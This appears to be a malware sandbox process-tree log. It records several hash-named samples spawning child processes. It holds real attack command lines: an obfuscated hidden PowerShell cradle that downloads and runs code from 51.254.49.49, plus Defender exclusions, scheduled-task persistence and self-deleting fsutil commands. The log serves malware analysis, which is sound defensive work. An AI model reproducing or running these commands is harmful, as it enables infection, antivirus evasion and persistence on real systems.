      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
      4⤵
      PID:6636
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3368 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
      4⤵
      PID:6776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3460 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
      4⤵
      PID:7032
- C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe
  "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"
  2⤵
  PID:4692
- - C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe
    "C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe"
    3⤵
    PID:1820
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s1ek.0.bat" "
      4⤵
      PID:744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3240
    - - C:\ProgramData\presepuesto\LEAJ.exe
        
        "C:\ProgramData\presepuesto\LEAJ.exe"
        5⤵
        
        PID:5024
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        6⤵
        Creates scheduled task(s)
        
        PID:5684
- - C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
    "C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe"
    3⤵
    PID:4672
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nnweubxpxnavd.exe /TR "C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & exit
    3⤵
    PID:1356
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /nobreak /t 3
      4⤵
      Delays execution with timeout.exe
      PID:208
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"
      4⤵
      PID:5480
- C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe
  "C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ClWWWrRvtgVoLl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9114.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:2668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ClWWWrRvtgVoLl.exe"
    3⤵
    PID:3172
- - C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe
    "C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"
    3⤵
    PID:4184
- C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe
  "C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe"
  2⤵
  PID:2452
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"
    3⤵
    PID:3424
- C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe
  "C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe"
  2⤵
  PID:988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ShsyqjjdO.bat" "
    3⤵
    PID:2476
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c mkdir "\\?\C:\Windows "
      4⤵
      PID:824
- - C:\Windows\SysWOW64\SndVol.exe
    C:\Windows\System32\SndVol.exe
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 1844
    3⤵
    - Program crash
    PID:4448
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-09-04\964555913ef321b88a1e52594f8438820230e704dd06f14768fafa9285038af9.wsf"
  2⤵
  PID:1096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    3⤵
    PID:4344
- C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe
  "C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe"
  2⤵
  PID:764
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:2244
- C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe
  "C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NzdSupOimejfx.exe"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzdSupOimejfx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDF53.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:1320
- - C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe
    "C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"
    3⤵
    PID:4692
- C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
  "C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
  2⤵
  PID:2584
- - C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
    "C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
    3⤵
    PID:4532
- - C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
    "C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
    3⤵
    PID:3096
- C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe
  "C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe"
  2⤵
  PID:1688
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1844
- C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe
  "C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"
  2⤵
  PID:4236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"
    3⤵
    PID:312
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NIebSjcCgFnY.exe"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NIebSjcCgFnY" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8D37.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5648
- C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
  "C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
  2⤵
  PID:1992
- - C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
    "C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
    3⤵
    PID:3604
- - C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
    "C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
    3⤵
    PID:5724
- C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe
  "C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"
  2⤵
  PID:452
- - C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe
    "C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"
    3⤵
    PID:5836
- C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe
  "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"
  2⤵
  PID:2668
- - C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe
    "C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe"
    3⤵
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe
    "C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe"
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & exit
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /nobreak /t 3
      4⤵
      Delays execution with timeout.exe
      PID:5764
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"
      4⤵
      PID:2360
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  PID:5820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718
    3⤵
    PID:4384
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
    3⤵
    PID:5480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:3020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
    3⤵
    PID:4868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
    3⤵
    PID:5576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
    3⤵
    PID:6124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
    3⤵
    PID:5324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
    3⤵
    PID:3368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
    3⤵
    PID:4324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
    3⤵
    PID:888
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
    3⤵
    PID:5028
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
    3⤵
    PID:5164
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
    3⤵
    PID:4424
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
    3⤵
    PID:1728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
    3⤵
    PID:4448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8
    3⤵
    PID:6068
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5748 /prefetch:8
    3⤵
    PID:3092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
    3⤵
    PID:3208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2
    3⤵
    PID:4716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
    3⤵
    PID:2596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
    3⤵
    PID:5288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
    3⤵
    PID:5612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
    3⤵
    PID:1832
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
    3⤵
    PID:6956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1356 /prefetch:1
    3⤵
    PID:6804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
    3⤵
    PID:6788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
    3⤵
    PID:6992
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:6036
- - C:\Windows\system32\NETSTAT.EXE
    netstat
    3⤵
    - Gathers network information
    PID:2556
- C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
  "C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
  2⤵
  PID:3988
- - C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
    "C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
    3⤵
    PID:5228
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe"
  2⤵
  PID:2420
- C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
  "C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
  2⤵
  PID:2804
